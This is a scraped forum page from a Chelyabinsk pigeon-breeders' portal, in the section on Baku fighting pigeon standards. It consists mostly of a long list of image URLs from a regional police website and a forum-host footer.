https://21.mvd.ru/upload/site24/document_images/W3CWjiMhwO-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/k9xqehQTEE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sunlkpR5ut-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lgRMOefxzQ.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK.jpg
https://21.mvd.ru/upload/site24/document_images/zWoJnm5M27-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/4r1RJ1pvy3-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/JGxN0RvLC7.jpg
https://21.mvd.ru/upload/site24/document_images/QUoga6Sn4g-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eoLnmCnFzO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb.jpg
https://21.mvd.ru/upload/site24/document_images/dSmGvU6Ugy-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tIRp1MFhu.jpg
https://21.mvd.ru/upload/site24/document_images/WyBPr7zeve.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oRjdOhGVHk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eY4JfHxMXk.jpg
https://21.mvd.ru/upload/site24/DG60Ff7Htj-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MZo96WnYmB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/CXU1mZGkkg-630xx292.jpg
https://21.mvd.ru/upload/site24/document_video/image/OdZS1eUjeq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/CpGBhIeaq5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vakUY9uD87-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/0WeO4JOYzD.jpg
https://21.mvd.ru/upload/site24/document_images/5gInaVRP4t-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3TsBFtFJVw.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5.jpg
https://21.mvd.ru/upload/site24/document_images/FPmpu0snjk-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MOEAd2gRCq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI.jpg
https://21.mvd.ru/upload/site24/document_images/D7azMNTYgC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/SzyrxYaU4m-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/JeulpXYo4m-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m6cwiE3JvV.jpg
https://21.mvd.ru/upload/site24/document_images/MjC2JPz66i.jpg
https://21.mvd.ru/upload/site24/document_images/8c8p84R2mg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vbMe21h5re.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/aHmgsLVpJj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tTQVdhOfwB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nAqDl21Vx0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fNfdVxsR5C-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-800x600.jpg
https://21.mvd.ru/upload/site24/cenfI9SD83-250x0.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE.jpg
https://21.mvd.ru/upload/site24/51f6287ae7df39d3aa3bba8357d4a0f3-65xx80.jpg

Xaqi

0

Вы здесь » Портал голубеводов Челябинской области » Стандарты бойных » Бакинские бойные голуби

Рейтинг форумов | Создать форум бесплатно © 2007–2017 «QuadroSystems» LLC